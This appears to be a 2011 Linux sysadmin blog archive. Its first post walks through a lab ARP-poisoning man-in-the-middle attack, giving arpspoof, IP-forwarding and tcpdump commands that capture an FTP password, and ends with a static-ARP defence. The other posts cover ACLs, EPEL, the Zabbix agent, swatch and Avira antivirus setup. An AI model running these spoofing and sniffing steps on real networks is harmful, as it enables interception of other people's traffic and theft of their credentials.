Please note that the things which I am going to explain throughout these articles can constitute a crime, so you will be solely responsible if you put them into action with bad intentions. The reason I want to tell you this is, on the one hand, that it is good for you to know the danger of connecting to an unreliable network and, on the other, that I will take advantage of it later to show you how to avoid these attacks.

To begin with, let's review how ARP (Address Resolution Protocol) works. Basically, this protocol is used to associate MAC and IP addresses.

For example, suppose one computer wants to know the MAC address of a router. In this case, that computer broadcasts a message to the network asking who has the IP address of that router (ARP request). Then, only the router responds to the computer with its MAC address (ARP reply).

From then on, the computer temporarily stores the router's IP and MAC addresses in its ARP table. ARP poisoning, as its name suggests, consists of manipulating the victim's ARP table by injecting fake ARP packets.

What kind of attacks can derive from this situation? For instance, the well-known Man in the Middle attack (MitM).

Below you can see the environment which I will use for my tests. Victim and attacker run Ubuntu 10.11, and ubuntu-server runs an Ubuntu Server 11.10 release.


In my first case, the attacker computer is going to intercept all communications between ubuntu-server and victim. To be more precise, the victim will connect to an FTP service installed on ubuntu-server, and the attacker will try to capture the password. Remember that with this sort of protocol, as with HTTP, SMTP, POP3, etc., the credentials are sent in the clear.

So that the attacker node can work as a transparent bridge, IP forwarding must be enabled on it. Furthermore, we have to install the dsniff package, which contains the arpspoof tool, the program that will be used to poison both computers (client and server).

root@attacker:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@attacker:~# aptitude install dsniff

Let's take a look at their ARP tables before modifying them. As you may appreciate, both computers have registered the correct MAC addresses.

javi@ubuntu-server:~$ arp -a
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
? (192.168.1.10) at 00:0c:29:69:81:47 [ether] on eth0

javi@victim:~$ arp -a
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
? (192.168.1.11) at 00:0c:29:18:36:e6 [ether] on eth0

The next step is to alter those tables by transmitting fake ARP frames.

root@attacker:~# arpspoof -i eth0 -t 192.168.1.10 192.168.1.11
0:c:29:20:9f:9b 0:c:29:69:81:47 0806 42: arp reply 192.168.1.11 is-at 0:c:29:20:9f:9b
...

root@attacker:~# arpspoof -i eth0 -t 192.168.1.11 192.168.1.10
0:c:29:20:9f:9b 0:c:29:18:36:e6 0806 42: arp reply 192.168.1.10 is-at 0:c:29:20:9f:9b
...

If we output the ARP tables again, we can see that the entries have been changed.

javi@ubuntu-server:~$ arp -a
? (192.168.1.20) at 00:0c:29:20:9f:9b [ether] on eth0
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
? (192.168.1.10) at 00:0c:29:20:9f:9b [ether] on eth0

javi@victim:~$ arp -a
? (192.168.1.11) at 00:0c:29:20:9f:9b [ether] on eth0
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
? (192.168.1.20) at 00:0c:29:20:9f:9b [ether] on eth0

At this point, the attacker is ready to sniff all traffic between the involved nodes. To simplify the test, just the FTP data will be picked up. In this case, I am dumping all FTP packets to a file with tcpdump, so as to be able to analyze them later with Wireshark. I could also have used Wireshark directly by means of a capture filter.

root@attacker:~# tcpdump -ni eth0 port 21 -s0 -w ftp.pcap

The last step is to establish an FTP session between victim and ubuntu-server.

javi@victim:~$ ftp 192.168.1.11
Connected to 192.168.1.11.
220 (vsFTPd 2.3.2)
Name (192.168.1.11:javi): javi
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Now we are going to open the capture file with Wireshark. As you can see, the password has been captured.




In addition, if you follow the TCP stream, you will find out that there are several retransmissions. That occurs because the attacker has to forward the TCP/IP packets. This sequence would also show up if you ran tcpdump on ubuntu-server.

And finally, also note that if IP forwarding were not activated, we would be causing a Denial of Service (DoS) attack, since the communication would be cut off.
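
A classic stopgap against this kind of poisoning (a more complete tool will be presented later in this series) is to pin a static entry for critical hosts, so that fake ARP replies can no longer overwrite it. For example, for the router:

javi@victim:~$ sudo arp -s 192.168.1.1 00:60:b3:50:ab:45

javi@victim:~$ arp -a
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] PERM on eth0
...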


Oct 19, 2011

Access Control Lists (II)

In the preceding article about Access Control Lists, we saw how to grant permissions on a file or directory for a particular user and, in addition, how to set them by default for new elements.

Now we are going to give permissions to the nobody group and to other users. Note that applying ACLs for other users works much like handling the chmod command.

[root@centos logs]# setfacl -m g:nobody:-w- 002.log

[root@centos logs]# setfacl -m o:rw- 002.log

[root@centos logs]# getfacl 002.log 
# file: 002.log
# owner: root
# group: root
user::rw-
user:nobody:r-x
group::---
group:nobody:-w-
mask::rwx
other::rw-

In order to remove ACLs, we can delete them for a specific user or group, clear all entries, or only get rid of the default ACLs.

[root@centos logs]# setfacl -x g:nobody 002.log

[root@centos /]# setfacl -R -b /logs

[root@centos /]# setfacl -k /logs

Another handy ACL option is to associate a mask with an ACL, that is to say, to establish the real or effective permissions on a file or directory. In this case, we are limiting the permissions available on it. For instance, in the following example we are setting read, write and execute permissions for the nobody user but, afterwards, we are also applying a mask of execute only.

[root@centos logs]# setfacl -m u:nobody:rwx 002.log

[root@centos logs]# setfacl -m m:--x 002.log

[root@centos logs]# getfacl 002.log
# file: 002.log
# owner: root
# group: root
user::rw-
user:nobody:rwx                 #effective:--x
group::---
mask::--x
other::rw-


Oct 13, 2011

Extra Packages for Enterprise Linux (EPEL)

Today I am going to fill you in on EPEL, a repository maintained by a Fedora group (made up of Red Hat engineers, volunteer community members, etc.) which offers a set of additional packages for Enterprise Linux distributions, such as RHEL, CentOS, Scientific Linux and so on.

For instance, when you purchase a license for RHEL, Red Hat guarantees you support for a series of packages included within its repositories, but many other applications are not provided through them.

Thereby, you have several options to install packages not located in the official repositories, such as grabbing them from RPM PBone. But another smart option is to set up an EPEL repository on your machine, whereby you will have high quality add-on packages which complement your system.

EPEL packages are built from the equivalent ones in the Fedora project, and they are updated for as long as the corresponding RHEL release is supported.

There are EPEL repositories for RHEL4, RHEL5 and RHEL6 (they are also valid for their derivatives). For my tests, I am going to use a CentOS 6.0 distro where I will install the appropriate 'epel-release' package. By default, only the stable EPEL repository is enabled. Later, you may enable the testing repositories, which are not yet considered stable (I do not recommend it).

[root@centos ~]# rpm -ivh http://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-5.noarch.rpm

[root@centos ~]# ls -l /etc/yum.repos.d/epel*
-rw-r--r--. 1 root root  957 oct 12  2010 /etc/yum.repos.d/epel.repo
-rw-r--r--. 1 root root 1056 oct 12  2010 /etc/yum.repos.d/epel-testing.repo

How can we check out if a package comes from EPEL?

[root@centos ~]# yum install keychecker

[root@centos ~]# keychecker httpd
CentOS-6 Key (CentOS 6 Official Signing Key)
--------------------------------------------
httpd-2.2.15-5.el6.centos.i686

[root@centos ~]# keychecker keychecker
EPEL (6)
--------
keychecker-0.2-2.el6.noarch

Another way is by using yum.

[root@centos ~]# yum info htop
...
Repo       : epel
Summary    : Interactive process viewer
...
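
And if you prefer to keep EPEL switched off by default (enabled=0 in epel.repo), you can still pull a package from it in a single transaction:

[root@centos ~]# yum --enablerepo=epel install htop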


Oct 4, 2011

Access Control Lists (I)

One month ago, I had to publish the log files of an application at work. The log directory had to be accessible by the development team (they use Windows). Note also that the application runs on CentOS 6.0.

No problem. I shared the directory through Samba and granted access to the guest user (on Linux, this is translated to the nobody user).

[root@centos ~]# cat /etc/samba/smb.conf 
[global]
        security      = user
        map to guest  = bad user
        guest account = nobody

[logs]
        path     = /logs
        readonly = yes
        guest ok = yes

Later I was warned that certain files could not be read. By taking a look at it, I could see that some files were being created with wrong permissions.

[root@centos ~]# ls -l /logs/
total 6148
-rw-------. 1 root root 4730880 oct  4 11:37 001.log
-rw-------. 1 root root 1564672 oct  4 11:37 002.log

As you can see, the files could only be read by the owner, in this case root. This was the second problem: the application ran as root and, of course, I could not allow access by means of this user.

We opened a ticket with the support center in order to find out whether it was possible to force the program to create the log files with other permissions. The response was fantastic: set up a cron task so as to change them periodically. As I usually say... a real botch job.

Fortunately, Linux is a great operating system which, if you know it in depth, lets you solve problems in different ways.

I sized up the situation and decided that the best option was to set an ACL (Access Control List). With ACLs, you can give selected users read, write and execute permissions on a specific file or directory.

First of all, you need to have the target filesystem mounted with the acl option.

[root@centos ~]# mount -o remount,acl /

[root@centos ~]# cat /etc/fstab
/dev/mapper/vg_centos-lv_root   /       ext4    defaults,acl    1 1
...

Then, you must grant the nobody user read and execute permissions on all elements of the directory; besides, new files or directories created within it will also have this ACL by default.

[root@centos ~]# setfacl -R -m u:nobody:r-x /logs

[root@centos ~]# setfacl -d -R -m u:nobody:r-x /logs

In this manner, when a user logs on via Samba (as the guest user), he will be able to read the files. Let's now get the full permissions of one of the files in the logs directory.

[root@centos ~]# getfacl /logs/001.log
# file: logs/001.log
# owner: root
# group: root
user::rw-
user:nobody:r-x
group::---
mask::r-x
other::---

As you can see above, apart from root, the nobody user can also read the file.

It may seem incredible, but ACLs are not well known. Throughout my professional life, I have seen authentic disasters in the way permissions are applied to files, mainly due to administrators' lack of knowledge.

And as you have seen, ACLs are an elegant way to handle file permissions. Next week I will finish this topic with other things that you can do with ACLs.


Sep 28, 2011

Zabbix client installation on Ubuntu

In this article, I want to write down how to set up the Zabbix client from its source code on Ubuntu distributions. Some time ago I posted a similar article using a CentOS host. This time, I am going to accomplish the same task but on Ubuntu Server 11.04 with Zabbix 1.8.7.

First of all, we need to download the source code from the Zabbix website and decompress it on the server. We must also have the build-essential package installed, so as to be able to compile the Zabbix client.

root@ubuntu-server:~# aptitude install build-essential

root@ubuntu-server:~/zabbix-1.8.7# ./configure --enable-agent

root@ubuntu-server:~/zabbix-1.8.7# make ; make install

Once we have correctly compiled and installed the Zabbix agent, the next step is to create the appropriate directories, copy the configuration files and add a new system user called zabbix.

root@ubuntu-server:~/zabbix-1.8.7# mkdir -p /etc/zabbix/alert.d /var/log/zabbix /var/run/zabbix

root@ubuntu-server:~/zabbix-1.8.7# cp -a misc/conf/zabbix_agentd.conf /etc/zabbix/

root@ubuntu-server:~/zabbix-1.8.7# cp misc/init.d/ubuntu/zabbix-agent.conf /etc/init/

root@ubuntu-server:~/zabbix-1.8.7# useradd -r -d /var/run/zabbix -s /sbin/nologin zabbix

root@ubuntu-server:~/zabbix-1.8.7# chown zabbix:zabbix /var/run/zabbix /var/log/zabbix

Afterwards, we must fill in the minimum information required in the Zabbix agent configuration file; in addition, it is also necessary to set up an Upstart job for starting and stopping the Zabbix agent service.

root@ubuntu-server:~# cat /etc/zabbix/zabbix_agentd.conf
...
# Zabbix client PID file
PidFile=/var/run/zabbix/zabbix_agentd.pid

# Zabbix client log file
LogFile=/var/log/zabbix/zabbix_agentd.log

# Allow remote commands from zabbix server
EnableRemoteCommands=1

# Maximum time for processing
Timeout=10

# System hostname
Hostname=ubuntu

# Zabbix server IP
Server=192.168.1.100


root@ubuntu-server:~# cat /etc/init/zabbix-agent.conf
# Start zabbix agent

pre-start script
   if [ ! -d /var/run/zabbix ]; then
           mkdir -p /var/run/zabbix
           chown zabbix:zabbix /var/run/zabbix
   fi
end script

start on filesystem
stop on starting shutdown
respawn
expect daemon
exec /usr/local/sbin/zabbix_agentd

The last step is to register the ports used by Zabbix in the services file and start the agent.

root@ubuntu-server:~# echo "zabbix-agent    10050/tcp  Zabbix Agent"   >> /etc/services
root@ubuntu-server:~# echo "zabbix-agent    10050/udp  Zabbix Agent"   >> /etc/services
root@ubuntu-server:~# echo "zabbix-trapper  10051/tcp  Zabbix Trapper" >> /etc/services
root@ubuntu-server:~# echo "zabbix-trapper  10051/udp  Zabbix Trapper" >> /etc/services


root@ubuntu-server:~# start zabbix-agent
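
To verify that everything went well, you can check that the agent is bound to its default TCP port (10050):

root@ubuntu-server:~# netstat -nltp | grep zabbix_agentd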


Sep 21, 2011

Avira AntiVir Personal on Linux (IV)

With this post, I am going to wrap up the series of articles about Avira AntiVir Personal on Linux. So let's take a look at one of its most important modules: AntiVir Guard.

AntiVir Guard takes care of scanning and protecting a filesystem in real time; that is to say, a virus will be detected before the file is accessed. How does it work? All directories which we want AntiVir Guard to protect are mounted through the DazukoFS module, previously compiled and inserted into the kernel.

[root@centos ~]# cat /etc/fstab
...
/home    /home    dazukofs 

AntiVir Guard (avguard) can be handled either by means of the avguard command or as an init daemon. In this article, I am going to focus on the second option, since it is the most useful and handy.

Thereby, we have to set it up by editing its configuration file (/etc/avira/avguard.conf). Below I am going to note the most important settings.

[root@centos ~]# vi /etc/avira/avguard.conf
...
# Try to remove the malicious code from the infected file (disabled by default).
# If the repair fails, the AlertAction is carried out.
RepairConcerningFiles

# Once a virus is detected, the access to the file is blocked and the action is logged.
# This allows you to specify an additional action to be followed for the concerning file.
# none or ignore: no further action (by default).
# rename or ren: rename the file by adding the .XXX extension.
# delete or del: delete the concerning file.
# quarantine: move the concerning file into quarantine.
AlertAction delete

# If quarantine option is selected, the infected files are moved into it.
QuarantineDirectory /home/quarantine

# Types of files to be scanned.
# extlist: scan only files with certain extensions.
# smart: scan files based on both their name and content.
# all: scan all files (by default).
ScanMode all

# File where all important operations are logged.
LogFile /var/log/avguard.log

# Detection of harmful or unwanted software (dial-up programs, jokes, faked emails, etc.).
# With the 'alltypes' option, all supported malware types will be detected.
DetectPrefixes adspy=yes appl=no bdc=yes dial=yes game=no joke=no pck=no phish=yes spr=no

# Activate the heuristics for macro virus in office documents.
# [yes (by default) | no].
HeuristicsMacro yes

# Set the level of heuristic detection in all types of files.
# Available values are 0 (off), 1 (low - by default), 2 (medium) and 3 (high).
HeuristicsLevel 2


[root@centos home]# /etc/init.d/avguard restart

To check it out, we are going to download the EICAR test file into the /home directory and try to dump its contents.

[root@centos home]# wget https://secure.eicar.org/eicar.com.txt

[root@centos home]# cat eicar.com.txt 
cat: eicar.com.txt: Operation not supported

[root@centos home]# tail -f /var/log/avguard.log 
2011-09-18 18:52:48 centos.local avguard.bin[1396]: AVGU: ALERT AntiVir ALERT for file "/home/eicar.com.txt": Details:        Eicar-Test-Signature ; virus ; Contains code of the Eicar-Test-Signature virus
2011-09-18 18:52:48 centos.local avguard.bin[1396]: AVGU: INFO The concerning file /home/eicar.com.txt has been removed from disk.
2011-09-18 18:52:48 centos.local avguard.bin[1396]: AVGU: INFO Info: the alert in file /home/eicar.com.txt was handled. Action(s) taken: access denied, condition logged, file deleted

As you can see, the infected file was removed as soon as we tried to read it. So imagine the number of possibilities which arise from this module, such as scanning in real time the files uploaded to an FTP or HTTP (WebDAV) server, or combining it with tools like swatch in order to send an alert or execute a task.
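
As a sketch of that last idea (swatch itself is covered in the article below), a rule like the following could watch avguard.log and mail the administrator whenever an ALERT entry is logged; the address is just an example.

watchfor /ALERT/
        mail addresses=root\@centos.local,subject="AntiVir Guard alert"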


Sep 12, 2011

Monitoring logs with swatch

Swatch is a GPL tool written in Perl which monitors logs in real time, and it is able to execute an action when a certain situation takes place.

An application can record an event in a file as a result of an error, a warning, etc., and at that moment, it may be interesting to restart the involved service or, for instance, to send an email reporting the alarm, all automatically.

This is where swatch comes in. You have two ways to install it: either by means of the package which each distribution keeps in its repositories, or directly by compiling the source code.

In the case of Ubuntu, the installation is really simple: aptitude install swatch. But in RHEL or CentOS, the package is not available in the official repositories of those distributions.

Therefore, in the present article I am going to walk through the installation of swatch (3.2.3) on CentOS 6.0 (32 bits, minimal installation) by downloading and installing the suitable packages from RPM PBone Search.

[root@centos tmp]# rpm -i perl-Carp-Clan-6.03-2.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Bit-Vector-7.1-2.el6.i686.rpm
[root@centos tmp]# rpm -i perl-Date-Calc-6.3-2.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Date-Manip-5.54-4.el6.noarch.rpm 
[root@centos tmp]# rpm -i perl-TimeDate-1.16-11.1.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Time-HiRes-1.9721-115.el6.i686.rpm
[root@centos tmp]# rpm -i perl-File-Tail-0.99.3-8.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Mail-Sendmail-0.79-12.el6.noarch.rpm

[root@centos tmp]# rpm -i swatch-3.2.3-2.el6.noarch.rpm

So that swatch can send alarms by email, you have to install some kind of MTA (Mail Transfer Agent) on your system, such as Postfix.

[root@centos ~]# yum install postfix

[root@centos ~]# cat /etc/postfix/main.cf
...
# Internet hostname
myhostname = centos.local

# Local Internet domain name
mydomain = local

# Domain that locally-posted mail appears to come from
myorigin = $myhostname

# Network interface addresses to receive mail
inet_interfaces = all

# List of domains to consider itself the final destination
mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
...

[root@centos ~]# service postfix restart

[root@centos ~]# chkconfig postfix on
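
Before moving on, you can quickly verify that Postfix delivers local mail; a sketch, assuming the mailx package is installed.

[root@centos ~]# echo "test" | mail -s "Postfix test" root@centos.local

[root@centos ~]# tail /var/log/maillog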

Through the following example, we will monitor the /var/log/secure file in order to detect logins by the user javi (we must look for the string "Accepted password for javi").

First of all, we have to create a directory to hold the configuration files of swatch. Afterwards, we must set up a file with the instructions needed to report the logins of the user javi.

[root@centos ~]# mkdir /etc/swatch

[root@centos ~]# cat /etc/swatch/swatch.conf
watchfor /Accepted password for javi/
        mail addresses=root\@centos.local,subject="Session opened by javi"

With the previous lines, swatch will monitor the content of the file given later on the command line, trying to match the requested string. When the matching text is found, an email will be sent.

To start swatch, we must run the next command (the '-t' option behaves like the traditional 'tail -f'). If instead of the '-t' parameter you add '-f', swatch examines the defined file once and then closes it. In this manner, the file is not kept open as in the case of a typical 'tail -f'.

[root@centos ~]# swatch -c /etc/swatch/swatch.conf -t /var/log/secure
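
If you prefer swatch to keep running in the background (for example, launched from a boot script), it can be detached with the '--daemon' option; a minimal sketch.

[root@centos ~]# swatch -c /etc/swatch/swatch.conf -t /var/log/secure --daemon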

Swatch has got many other options for its configuration file, such as outputting the matched pattern, ringing a bell, executing commands and so on. The following example watches for a couple of strings.

[root@centos ~]# cat /etc/swatch/swatch.conf
watchfor /Accepted password for javi|Accepted password for pepe/
    echo=red
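
For instance, the 'exec' action makes it possible to run a command when a pattern is matched. The following sketch (the watched string and the restarted service are hypothetical) would restart Apache whenever the given error shows up in the monitored log.

[root@centos ~]# cat /etc/swatch/swatch.conf
watchfor /Too many open files/
    exec "/etc/init.d/httpd restart"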


Sep 6, 2011

Avira AntiVir Personal on Linux (III)

Now that we have installed Avira AntiVir Personal on Linux (II), in this article I am going to cover one of its main modules: the AntiVir Command Line Scanner (avscan).

This component is launched from the command prompt (on demand), and it takes care of analyzing files in order to look for possible malware infections. Avscan can delete, repair, isolate or simply warn.

One of the most powerful advantages of this kind of tool is that it can be integrated with scripts. In this way, you may use it for example with a web service, where files are uploaded and it may be necessary to scan them before storing them on the hard drive.

Avscan can be configured by means of its own configuration file (/etc/avira/avscan.conf). In this manner, when you run the scanner, it will use the options established in that file (by default).

But indeed, the most interesting possibility is to be able to set the scanning options when you execute it, because, for instance, you might have various scanning tasks with different types of analysis.

Then let's take a look at the principal features of avscan. For this purpose, I will download the EICAR test file (a harmless file used to try out the behaviour of an antivirus).

[root@centos ~]# wget https://secure.eicar.org/eicar.com

[root@centos ~]# avscan -h
syntax: avscan [option ...] [directory] [filename] ...
...

When a virus is detected, you may choose between several actions: ignore the alert (none or ignore), remove the file (delete or del), change the name of the file (rename or ren) or move the file into the quarantine area (quarantine). You can also add the '-e' parameter so that the infected file is repaired whenever possible.

[root@centos ~]# avscan --batch --alert-action=quarantine eicar.com

[root@centos ~]# avscan --batch --alert-action=delete -e eicar.com

By adding the '--batch' parameter, we prevent avscan from prompting us during the analysis, and all decisions are performed based on the configuration file and command-line settings.

Another option is to detect certain categories of software which are not considered malware, such as joke programs (joke), files compressed with an unusual tool (pck), dial-up programs (dial) and so on. With the 'alltypes' option, all available types will be treated.

[root@centos ~]# avscan --batch --alert-action=delete --detect-prefixes="joke=yes phish=yes" eicar.com

[root@centos ~]# avscan --batch --alert-action=delete --detect-prefixes=alltypes eicar.com

Regarding the virus analysis, another important option is to enable heuristic scanning. Avscan is able to use heuristics to determine whether a certain file is malicious, which allows new or unknown code to be detected before a signature update is available. The heuristics level increases the intensity of the scanning: 0 (off), 1 (low, by default), 2 (medium) and 3 (high).

[root@centos ~]# avscan --batch --alert-action=delete --heur-level=3 eicar.com

By default, avscan decides which files must be scanned based on their name and content (smart). You can force it to scan files according to their filename extensions (extlist) or to analyze all files regardless of their name or content (all).

[root@centos ~]# avscan --batch --alert-action=delete --scan-mode=all dir/

With respect to directories, if you want to enable recursive scanning of all subdirectories within a specific path, you will have to add the '-s' parameter, as shown below.
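
A sketch of such a recursive analysis, following the previous examples:

[root@centos ~]# avscan --batch -s --alert-action=delete dir/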

And finally, also point out that avscan returns a code after ending the analysis, which can be really useful when it is managed through scripts.

[root@centos ~]# avscan --help
...
list of return codes:
   0: Normal program termination, nothing found, no error
   1: Found concerning file
   3: Suspicious file found
   4: Warnings were issued
 255: Internal error
 254: Configuration error (invalid parameter in command-line
      or configuration file)
 253: Error while preparing on-demand scan
 252: The avguard daemon is not running
 251: The avguard daemon is not accessible
 250: Cannot initialize scan process
 249: Scan process not completed
 248: No valid license found
 211: Program aborted, because the self check failed

[root@centos ~]# avscan --batch --alert-action=delete eicar.com

[root@centos ~]# echo $?
1
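
As a sketch of how these return codes might be used from a script (the script path and messages are hypothetical), a small wrapper could accept or reject a freshly uploaded file.

[root@centos ~]# cat /usr/local/bin/scan-upload.sh
#!/bin/bash
# Scan the file received as first argument and report the result.
avscan --batch --alert-action=delete "$1"
RET=$?

case $RET in
    0)   echo "clean: $1" ;;
    1|3) echo "malware found, file removed: $1" >&2 ; exit 1 ;;
    *)   echo "scanner error ($RET): $1" >&2 ; exit 2 ;;
esac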

If you want to review the rest of the options, you can check the avscan.conf file or run avscan with the '--help' parameter.


Aug 30, 2011

Avira AntiVir Personal on Linux (II)

Once we have installed DazukoFS on the system - Avira AntiVir Personal on Linux (I) -, we can go ahead with the installation of Avira AntiVir 3.1.3.5.

[root@centos tmp]# wget http://dlpe.antivir.com/package/wks_avira/unix/en/pers/antivir_workstation-pers.tar.gz

[root@centos tmp]# tar xvzf antivir_workstation-pers.tar.gz ; cd antivir-workstation-pers-3.1.3.5-0

The installation process is carried out by means of a bash script. After accepting the license, the installer asks if we want to create a link for avupdate-guard.

[root@centos antivir-workstation-pers-3.1.3.5-0]# ./install
...
Would you like to create a link in /usr/sbin for avupdate-guard ? [y]
linking /usr/sbin/avupdate-guard to /usr/lib/AntiVir/guard/avupdate-guard ... done

Then the script can set up a cron task (/etc/cron.d/avira_updater) for automatic updates.

Would you like to setup Scanner update as cron task ? [y]
...
What time should updates be done [00:15]?
creating Scanner update cronjob ... done

The previous task checks if there is any update related to the scanner, engine or vdf files. In addition, if you accept the next request, the Guard module will also be updated periodically.

Would you like to check for Guard updates once a week ? [n]

setup internet updater complete

The next step takes care of installing DazukoFS. Since this operation was previously accomplished, it will not be necessary to repeat it.

Preinstalled dazukofs module found on your system.

Would you like to reinstall dazukofs now ? [y] n
Dazukofs module is loaded

Through the following question, you can specify which directories must be protected by AntiVir Guard. I have selected the default option. Later, you may change this choice or add more directories by editing the fstab file, as sketched after the installer output below.

Watch out with this selection, because regardless of the antivirus used, when you set up an on-access daemon, you have to avoid certain directories such as /sys, /proc, /root or the root directory / itself.

Guard will automatically protect all directories which are mounted upon dazukofs filesystem.

Please specify at least one directory to be protected by Guard to add in /etc/fstab : [/home]
The following directories will be protected by Guard:
/home
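
As mentioned above, more directories can be protected later just by adding new dazukofs lines to fstab and remounting; a sketch with a hypothetical /srv/ftp directory.

[root@centos ~]# cat /etc/fstab
...
/home       /home       dazukofs
/srv/ftp    /srv/ftp    dazukofs

[root@centos ~]# mount -a -t dazukofs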

Then the installer verifies whether the quarantine directory exists. This directory is used to isolate a suspicious or infected file, so as to be able to repair it later.

Would you like to create /home/quarantine ? [y]
creating /home/quarantine ... done

Afterwards, you are asked if you want to make a link to AntiVir Guard and whether it should be automatically activated at system start.

Would you like to create a link in /usr/sbin for avguard ? [y]
linking /usr/sbin/avguard to /usr/lib/AntiVir/guard/avguard ... done

Please specify if boot scripts should be set up.
Set up boot scripts ? [y]

With the last step, we run AntiVir Guard.

Would you like to start AVIRA Guard now? [y]
Starting AVIRA AntiVir Workstation Personal ...
Starting: avguard.bin

After finishing the installation, it is highly recommended to perform a complete update of the application.

[root@centos ~]# avupdate-guard --product=Guard